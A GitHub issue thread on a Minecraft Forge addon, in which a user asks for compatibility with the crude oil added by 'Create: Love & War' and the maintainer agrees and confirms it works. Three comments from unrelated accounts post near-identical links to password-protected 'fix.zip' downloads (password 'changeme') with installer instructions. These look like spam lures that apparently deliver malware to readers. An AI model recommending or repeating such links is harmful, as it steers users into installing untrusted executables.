### ISSUE TITLE
Request: Compatibility with "Create: Love & War"

### ISSUE THREAD

**Issue by MightyMyc** [Amronos/create-addon-compatibility#16]
**What feature(s) do you want added?**
Mods: Create: Love & War
Minecraft Version: 1.20.1
Loader: Forge
Feature: Mod compatibility for the "Crude Oil" resource

**Is your feature request related to a problem? Please describe.**
I consider this feature to be an attempt, to RESOLVE a problem. In "Create: Love and War" crude oil exists underneath every ocean and desert biomes are filled with crude oil in the sand itself (i have no idea how you REMOVE it from the sand in order to do....anything at all with it). There's so much of it that this needs to be addressed.

**Describe the solution you'd like**
Make the crude oil from "Love and War" compatible with the oil from other mods.

There really isn't much more to say. Given how 'available' oil is in "Love & War" it absolutely needs to be usable by other mods which depend on crude oil as a resource. Given that a major goal of the addon compatibility mod seems to be to unify oil resources in "Create: Mod", this seems to be an oversight (you likely weren't aware of it, going in, who would assume "Love & War" is an oil mod when it revolves around making guns? HISTORICAL guns no less)

**Additional context**
When i say "Love & War" adds "Crude Oil" to the game, i am drastically understating the issue. It is everywhere, if you even APPROACH an ocean, the entire bedrock layer becomes essentially unusable, you can't mine down there, it's literally nothing but crude oil. There's so MUCH oil down there it's not even a gun mod anymore, it's not even a biome mod, it's essentially a dimension mod because the moment you find it, you will not find ANYTHING ELSE DOWN THERE EVER AGAIN (and using spectator mode doesn't help much). 

There's so much oil, it has become a problem. It makes the entire rest of the game difficult to play when you are near oceans. You cannot even find OTHER oil resources. I have spent five HOURS trying to find "TFMG Oil Deposits" but the moment you approach crude oil for "Love & War" it becomes difficult just to navigate around it. 

If it's going to be such a problem, it may as well be useful for more than just making parts for ONE gun mod (a gun mod which isn't even compatible with other gun mods no less). This would be absolutely GREAT if i was using it to make parts for say, "Tinker's Construct" or making tons of plastic blocks and furniture, but as it is it can't DO that. It is absolutely unacceptable for one mod to make such drastic changes to world generation when it can only be used for such a tiny part of your modded game. This problem is so big, until you or SOMEONE makes a patch, the mod is nearly unusable.

**Comment by Superstar-IT** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by li371359001** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by HeinousAgenda38** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Amronos** [comment]
You are correct, I did not know about it. I will go ahead and add compatibility for this mod's crude oil. Also if this mod has a github you should create an issue (if not done already) about the fact that a lot of crude oil is generating.

**Comment by Amronos** [comment]
I just tested this out, and the crude oil from Create: Love & War does work in the various distillation processes from other mods. I will update the description saying the crude oil from Create: Love & War is compatible later.
